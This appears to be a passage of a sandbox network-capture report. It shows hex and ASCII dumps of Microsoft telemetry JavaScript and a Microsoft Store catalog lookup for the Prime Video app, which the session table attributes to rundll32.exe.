                                                                                                                                                                                    Data Ascii: ",oi="_ckMgr",si=null,ci=null,ui=null,li=oe(),fi={},di={};function pi(e){return!e||e.isEnabled()}function gi(e,t){return t&&e&&V(e.ignoreCookies)&&-1!==e.ignoreCookies[k](t)}function vi(e,t){var n,r;return e?n=e.getCookieMgr():t&&(n=t[A][oi]||hi(t)),n||(e
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14899INData Raw: 5b 69 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 7d 2c 65 5b 61 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 7d 2c 65 29 29 2c 76 5b 4c 61 5d 3d 61 29 2c 61 7d 2c 76 5b 43 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 26 26 61 5b 43 65 5d 28 65 29 7d 2c 76 5b 62 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 26 26 61 5b 62 65 5d 28 65 29 7d 2c 76 2e 67 65 74 43 6f 6f 6b 69 65 4d 67 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 3d 43 7c 7c 68 69 28 79 2c 76 5b 68 65 5d 29 7d 2c 76 2e 73 65 74 43 6f 6f 6b 69 65 4d 67 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 43 3d 65 7d 2c 76 5b 75 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6f 7c 7c 67 7c 7c 65 6e 28 79 2e 65 6e 61 62 6c 65 50 65 72 66
                                                                                                                                                                                    Data Ascii: [it]=function(e,t){},e[at]=function(e,t){},e)),v[La]=a),a},v[Ce]=function(e){a&&a[Ce](e)},v[be]=function(e){a&&a[be](e)},v.getCookieMgr=function(){return C=C||hi(y,v[he])},v.setCookieMgr=function(e){C=e},v[ut]=function(){var e;return o||g||en(y.enablePerf
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14915INData Raw: 3d 6a 73 28 69 7c 7c 61 7c 7c 65 29 2c 75 2e 65 76 74 3d 6a 73 28 61 7c 7c 65 29 2c 75 5b 4b 6f 5d 3d 63 2c 75 2e 73 74 61 63 6b 44 65 74 61 69 6c 73 3d 4b 73 28 6f 7c 7c 69 7c 7c 61 29 2c 75 2e 65 72 72 6f 72 53 72 63 3d 73 2c 75 7d 2c 58 73 2e 43 72 65 61 74 65 46 72 6f 6d 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 29 7b 76 61 72 20 69 3d 65 5b 48 6f 5d 26 26 57 74 28 65 5b 48 6f 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 51 73 5b 58 6f 5d 28 74 2c 65 29 7d 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 58 73 28 74 2c 51 28 51 28 7b 7d 2c 65 29 2c 7b 65 78 63 65 70 74 69 6f 6e 73 3a 69 7d 29 2c 6e 2c 72 29 7d 2c 58 73 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                    Data Ascii: =js(i||a||e),u.evt=js(a||e),u[Ko]=c,u.stackDetails=Ks(o||i||a),u.errorSrc=s,u},Xs.CreateFromInterface=function(t,e,n,r){var i=e[Ho]&&Wt(e[Ho],function(e){return Qs[Xo](t,e)});return new Xs(t,Q(Q({},e),{exceptions:i}),n,r)},Xs.prototype.toInterface=functio
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15060INData Raw: 26 26 61 5b 71 63 5d 7c 7c 22 22 29 2c 41 2e 73 74 6f 70 28 65 2c 74 2c 6e 2c 72 29 2c 53 2e 63 6f 6e 66 69 67 5b 45 63 5d 26 26 4f 5b 55 63 5d 28 65 2c 74 29 7d 63 61 74 63 68 28 6f 29 7b 64 28 31 2c 33 32 2c 22 73 74 6f 70 54 72 61 63 6b 50 61 67 65 20 66 61 69 6c 65 64 2c 20 70 61 67 65 20 76 69 65 77 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 6d 28 6f 29 2c 7b 65 78 63 65 70 74 69 6f 6e 3a 73 65 28 6f 29 7d 29 7d 7d 2c 53 5b 42 63 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 5b 7a 63 5d 7c 7c 65 5b 4b 63 5d 7c 7c 45 72 72 6f 72 28 53 6f 29 2c 72 3d 43 63 28 6e 65 77 20 47 73 28 53 5b 4d 63 5d 28 29 2c 72 2c 65 2e 70 72 6f 70 65 72 74 69 65 73 7c 7c 74 2c 65 2e 6d 65 61 73 75 72 65 6d 65
                                                                                                                                                                                    Data Ascii: &&a[qc]||""),A.stop(e,t,n,r),S.config[Ec]&&O[Uc](e,t)}catch(o){d(1,32,"stopTrackPage failed, page view will not be collected: "+m(o),{exception:se(o)})}},S[Bc]=function(e,t,n){var r=e[zc]||e[Kc]||Error(So),r=Cc(new Gs(S[Mc](),r,e.properties||t,e.measureme
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15076INData Raw: 72 5d 2e 6e 61 6d 65 29 26 26 21 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 6d 73 2e 22 29 26 26 28 6e 5b 74 5d 3d 65 2e 61 74 74 72 69 62 75 74 65 73 5b 72 5d 2e 76 61 6c 75 65 29 3b 65 3d 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7c 7c 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 6e 7d 2c 69 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 54 69 6d 65 54 6f 43 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 75 72 28 29 3b 69 66 28 65 26 26 65 2e 74 69 6d 69 6e 67 29 7b 65 3d 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3b 69 66 28 65 26 26 30 21 3d 3d 65 29 72 65 74 75 72 6e 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2d 65 7d 72 65 74 75 72 6e
                                                                                                                                                                                    Data Ascii: r].name)&&!t.toLowerCase().indexOf("ms.")&&(n[t]=e.attributes[r].value);e=e.parentElement||e.parentNode}return n},il.prototype._getTimeToClick=function(){var e=ur();if(e&&e.timing){e=e.timing.navigationStart;if(e&&0!==e)return(new Date).getTime()-e}return
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15092INData Raw: 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 5f 26 26 5f 2e 74 65 61 72 64 6f 77 6e 28 65 2c 74 29 2c 64 2e 5f 64 6f 54 65 61 72 64 6f 77 6e 28 65 2c 74 29 2c 6e 28 29 7d 7d 29 2c 53 7d 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 22 22 7d 4e 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 6b 65 52 65 71 75 65 73 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 61 2c 6f 2c 73 3d 74 68 69 73 3b 68 72 28 29 3f 28 28 61 3d 6e 65 77 20 58 44 6f 6d 61 69 6e 52 65 71 75 65 73 74 29 2e 6f 70 65 6e 28 6e 2c 65 29 2c 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 32 30 30 2c 78 6c 28 61 29
                                                                                                                                                                                    Data Ascii: own=function(e,t){_&&_.teardown(e,t),d._doTeardown(e,t),n()}}),S}function xl(e){try{return e.responseText}catch(t){}return""}Nl.prototype.makeRequest=function(e,t,n,r){var i,a,o,s=this;hr()?((a=new XDomainRequest).open(n,e),a.onload=function(){r(200,xl(a)
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15108INData Raw: 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 7b 7d 2c 74 3d 57 6c 2c 72 3d 65 2e 68 65 61 64 65 72 73 3b 72 26 26 72 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 5b 74 5d 3d 65 7d 29 2c 65 2e 62 6f 64 79 26 26 65 2e 74 65 78 74 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 3d 65 7d 29 2c 6f 7c 7c 28 6f 3d 21 30 2c 6d 28 69 2c 65 2e 73 74 61 74 75 73 2c 6e 2c 74 29 2c 66 28 74 29 29 7d 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 7c 7c 28 6f 3d 21 30 2c 6d 28 69 2c 30 2c 7b 7d 29 29 7d 29 2c 61 26 26 21 6f 26 26 28 6f 3d 21 30 2c 6d 28 69 2c 32 30 30 2c 7b 7d 29 29 2c 21 6f 26 26 30 3c 65 2e 74 69 6d 65 6f 75 74 26 26 78 2e 73 65 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f
                                                                                                                                                                                    Data Ascii: n(function(e){var n={},t=Wl,r=e.headers;r&&r.forEach(function(e,t){n[t]=e}),e.body&&e.text().then(function(e){t=e}),o||(o=!0,m(i,e.status,n,t),f(t))})["catch"](function(e){o||(o=!0,m(i,0,{}))}),a&&!o&&(o=!0,m(i,200,{})),!o&&0<e.timeout&&x.set(function(){o
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15123INData Raw: 6e 28 29 7b 72 65 74 75 72 6e 20 30 3c 46 7d 2c 6c 2e 5f 73 65 74 54 72 61 6e 73 6d 69 74 50 72 6f 66 69 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7a 21 3d 3d 65 26 26 42 5b 65 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 63 28 29 2c 7a 3d 65 2c 6f 28 29 29 7d 2c 6c 2e 5f 62 61 63 6b 4f 66 66 54 72 61 6e 73 6d 69 73 73 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 3c 34 26 26 28 6a 2b 2b 2c 63 28 29 2c 6f 28 29 29 7d 2c 6c 2e 5f 63 6c 65 61 72 42 61 63 6b 4f 66 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 26 26 28 6a 3d 30 2c 63 28 29 2c 6f 28 29 29 7d 2c 6e 65 28 6c 2c 22 5f 73 65 74 54 69 6d 65 6f 75 74 4f 76 65 72 72 69 64 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 2e 73 65 74 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 3d
                                                                                                                                                                                    Data Ascii: n(){return 0<F},l._setTransmitProfile=function(e){z!==e&&B[e]!==undefined&&(c(),z=e,o())},l._backOffTransmission=function(){j<4&&(j++,c(),o())},l._clearBackOff=function(){j&&(j=0,c(),o())},ne(l,"_setTimeoutOverride",function(){return O.set},function(e){O=
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15139INData Raw: 22 2c 52 70 3d 22 65 78 63 6c 75 64 65 52 65 71 75 65 73 74 46 72 6f 6d 41 75 74 6f 54 72 61 63 6b 69 6e 67 50 61 74 74 65 72 6e 73 22 2c 4c 70 3d 22 61 64 64 52 65 71 75 65 73 74 43 6f 6e 74 65 78 74 22 2c 55 70 3d 22 64 69 73 61 62 6c 65 41 6a 61 78 54 72 61 63 6b 69 6e 67 22 2c 56 70 3d 22 64 69 73 61 62 6c 65 46 65 74 63 68 54 72 61 63 6b 69 6e 67 22 2c 48 70 3d 22 73 74 61 74 75 73 22 2c 46 70 3d 22 73 74 61 74 75 73 54 65 78 74 22 2c 71 70 3d 22 68 65 61 64 65 72 4d 61 70 22 2c 42 70 3d 22 6f 70 65 6e 44 6f 6e 65 22 2c 7a 70 3d 22 73 65 6e 64 44 6f 6e 65 22 2c 4b 70 3d 22 72 65 71 75 65 73 74 53 65 6e 74 54 69 6d 65 22 2c 57 70 3d 22 61 62 6f 72 74 44 6f 6e 65 22 2c 6a 70 3d 22 67 65 74 54 72 61 63 65 49 64 22 2c 47 70 3d 22 67 65 74 54 72 61 63 65
                                                                                                                                                                                    Data Ascii: ",Rp="excludeRequestFromAutoTrackingPatterns",Lp="addRequestContext",Up="disableAjaxTracking",Vp="disableFetchTracking",Hp="status",Fp="statusText",qp="headerMap",Bp="openDone",zp="sendDone",Kp="requestSentTime",Wp="abortDone",jp="getTraceId",Gp="getTrace
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15155INData Raw: 65 61 64 65 72 73 2e 61 70 70 65 6e 64 29 7c 7c 28 65 2e 68 65 61 64 65 72 73 3d 6e 65 77 20 48 65 61 64 65 72 73 28 65 2e 68 65 61 64 65 72 73 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 71 75 65 73 74 26 26 74 2e 68 65 61 64 65 72 73 7c 7c 7b 7d 29 29 2c 65 2e 68 65 61 64 65 72 73 2e 61 70 70 65 6e 64 28 22 4d 53 2d 43 56 22 2c 72 29 29 3a 65 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 4d 53 2d 43 56 22 2c 72 29 29 2c 65 7d 2c 75 2e 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 61 2c 6f 2c 73 3d 65 2e 65 78 74 65 6e 73 69 6f 6e 43 6f 6e 66 69 67 3d 65 2e 65 78 74 65 6e 73 69 6f 6e 43 6f 6e 66 69 67 7c 7c 5b 5d 2c 63 3d 28 73 5b 75 2e 69 64 65 6e 74 69 66 69 65 72 5d 3d 73 5b
                                                                                                                                                                                    Data Ascii: eaders.append)||(e.headers=new Headers(e.headers||t instanceof Request&&t.headers||{})),e.headers.append("MS-CV",r)):e.setRequestHeader("MS-CV",r)),e},u.initialize=function(e,t,n){var r,i,a,o,s=e.extensionConfig=e.extensionConfig||[],c=(s[u.identifier]=s[
                                                                                                                                                                                    2023-01-05 07:58:52 UTC15171INData Raw: 65 74 75 72 6e 20 6f 28 22 61 6c 77 61 79 73 41 64 64 43 76 54 6f 52 65 71 75 65 73 74 48 65 61 64 65 72 22 29 2c 21 30 7d 2c 43 76 2e 70 72 6f 74 6f 74 79 70 65 2e 64 6f 4e 6f 74 43 68 61 6e 67 65 53 75 70 70 6f 72 74 43 6f 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 28 22 64 6f 4e 6f 74 43 68 61 6e 67 65 53 75 70 70 6f 72 74 43 6f 72 73 22 29 2c 21 30 7d 2c 43 76 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 54 61 72 67 65 74 55 72 69 4f 76 65 72 72 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 28 22 73 65 74 54 61 72 67 65 74 55 72 69 4f 76 65 72 72 69 64 65 22 29 7d 3b 76 61 72 20 79 76 3d 43 76 3b 66 75 6e 63 74 69 6f 6e 20 43 76 28 29 7b 7d 54 76 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 63 6f 72 64 54 69 6d 65 53 70 61 6e 3d 66
                                                                                                                                                                                    Data Ascii: eturn o("alwaysAddCvToRequestHeader"),!0},Cv.prototype.doNotChangeSupportCors=function(){return o("doNotChangeSupportCors"),!0},Cv.prototype.setTargetUriOverride=function(e){o("setTargetUriOverride")};var yv=Cv;function Cv(){}Tv.prototype.recordTimeSpan=f


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    51192.168.2.44987420.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15175OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=AmazonVideo.PrimeVideo_pwbj9vvecjh7j&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: boTyXZJqYkehc3fy.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15176INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 31473
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:08 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: 1723a2c2-9f46-4bef-8645-faf3092d6143
                                                                                                                                                                                    MS-RequestId: 064ade46-a0f3-418e-9b6b-b8a60719538e
                                                                                                                                                                                    MS-CV: boTyXZJqYkehc3fy.0.2.4.4008884647.130921339.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: b4ddc6-28q8n
                                                                                                                                                                                    MS-DocumentVersions: 9P6RC76MSMMJ|2019
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15176INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 50 36 52 43 37 36 4d 53 4d 4d 4a 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 31 32 2d 31 34 54 31 36 3a 33 30 3a 34 38 2e 38 39 38 37 32 38 35 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 35 38 39 36 36 33 32 33 39 35 31 30 39 36 32 33 39 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43
                                                                                                                                                                                    Data Ascii: {"BigIds":["9P6RC76MSMMJ"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-12-14T16:30:48.8987285Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3058966323951096239","EISListingIdentifier":null,"BackgroundColor":"transparent","C
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15177INData Raw: 22 57 69 64 74 68 22 3a 37 35 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 36 39 33 39 38 31 37 31 32 37 32 32 31 33 38 32 31 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 39 31 38 36 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 30 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 4c 6f 67 6f 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 31 6d 38 35 53 74 2b 64 66
                                                                                                                                                                                    Data Ascii: "Width":75},{"FileId":"3069398171272213821","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":9186,"ForegroundColor":"","Height":100,"ImagePositionInfo":"","ImagePurpose":"Logo","UnscaledImageSHA256Hash":"1m85St+df
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15178INData Raw: 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 32 32 35 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 71 36 59 50 6f 6c 6b 6c 7a 2b 65 6f 65 30 4b 35 43 53 38 61 71 58 47 76 4b 64 6b 77 71 52 61 50 6b 2f 65 6f 61 71 68 5a 59 4b 63 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 34 32 36 36 37 2e 31 34 36 31 38 39 38 35 35 33 36 39 31 39 39 30 35 2e 34 62 33 30 65 34 66 33 2d 66 37 61 31 2d 34 34 32 31 2d 38 34 30 63 2d 32 63 63 39 37 62
                                                                                                                                                                                    Data Ascii: "ForegroundColor":"","Height":225,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"q6YPolklz+eoe0K5CS8aqXGvKdkwqRaPk/eoaqhZYKc=","Uri":"//store-images.s-microsoft.com/image/apps.42667.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15179INData Raw: 69 7a 65 77 57 35 45 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 33 38 34 37 33 2e 31 34 36 31 38 39 38 35 35 33 36 39 31 39 39 30 35 2e 62 66 64 63 65 66 34 62 2d 39 36 62 65 2d 34 31 62 36 2d 62 65 38 65 2d 35 66 61 39 34 61 31 34 33 36 38 31 2e 30 31 38 31 63 36 33 65 2d 63 64 33 66 2d 34 36 30 61 2d 38 62 33 39 2d 61 66 64 32 62 65 38 61 33 36 63 35 22 2c 22 57 69 64 74 68 22 3a 34 34 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 31 33 37 35 33 30 39 36 37 30 30 34 33 35 30 30 32 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70
                                                                                                                                                                                    Data Ascii: izewW5E=","Uri":"//store-images.s-microsoft.com/image/apps.38473.14618985536919905.bfdcef4b-96be-41b6-be8e-5fa94a143681.0181c63e-cd3f-460a-8b39-afd2be8a36c5","Width":44},{"FileId":"3013753096700435002","EISListingIdentifier":null,"BackgroundColor":"transp
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15180INData Raw: 64 32 62 66 37 39 65 61 36 61 22 2c 22 57 69 64 74 68 22 3a 38 38 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 34 36 31 30 35 31 33 30 33 36 38 39 32 30 35 31 30 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 36 38 38 31 39 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 33 31 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73
                                                                                                                                                                                    Data Ascii: d2bf79ea6a","Width":88},{"FileId":"3046105130368920510","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":68819,"ForegroundColor":"","Height":310,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Has
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15181INData Raw: 6e 42 79 74 65 73 22 3a 34 36 39 38 36 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 36 32 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 5a 58 35 67 65 37 39 49 61 5a 66 4c 63 77 66 68 48 74 69 4c 4f 70 44 45 43 70 53 77 6b 36 33 46 44 44 69 58 49 61 4a 51 35 6c 6f 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 33 32 33 35 37 2e 31 34 36 31 38 39 38 35 35 33 36 39 31 39 39 30 35 2e 34 62 33 30 65 34 66 33 2d 66 37 61 31 2d 34 34
                                                                                                                                                                                    Data Ascii: nBytes":46986,"ForegroundColor":"","Height":620,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"ZX5ge79IaZfLcwfhHtiLOpDECpSwk63FDDiXIaJQ5lo=","Uri":"//store-images.s-microsoft.com/image/apps.32357.14618985536919905.4b30e4f3-f7a1-44
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15182INData Raw: 72 42 7a 61 59 71 39 31 61 71 65 43 6f 53 39 35 62 56 4d 55 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 31 32 33 33 36 2e 31 34 36 31 38 39 38 35 35 33 36 39 31 39 39 30 35 2e 34 62 33 30 65 34 66 33 2d 66 37 61 31 2d 34 34 32 31 2d 38 34 30 63 2d 32 63 63 39 37 62 31 30 65 38 65 30 2e 34 38 36 33 39 33 37 33 2d 61 62 36 34 2d 34 63 34 38 2d 62 33 36 64 2d 32 61 66 37 36 31 30 36 34 62 63 33 22 2c 22 57 69 64 74 68 22 3a 31 30 37 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 35 31 32 37 39 32 36 32 36 38 37 38 33 37 31 38 30 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                    Data Ascii: rBzaYq91aqeCoS95bVMU=","Uri":"//store-images.s-microsoft.com/image/apps.12336.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b10e8e0.48639373-ab64-4c48-b36d-2af761064bc3","Width":107},{"FileId":"3051279262687837180","EISListingIdentifier":null,"Background
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15183INData Raw: 30 2d 34 62 61 66 2d 34 61 32 61 2d 61 61 33 61 2d 39 30 38 38 62 32 39 61 64 63 35 34 22 2c 22 57 69 64 74 68 22 3a 33 31 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 32 30 39 35 39 34 37 38 37 33 35 33 34 32 35 31 36 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 38 36 31 35 39 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 32 32 35 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 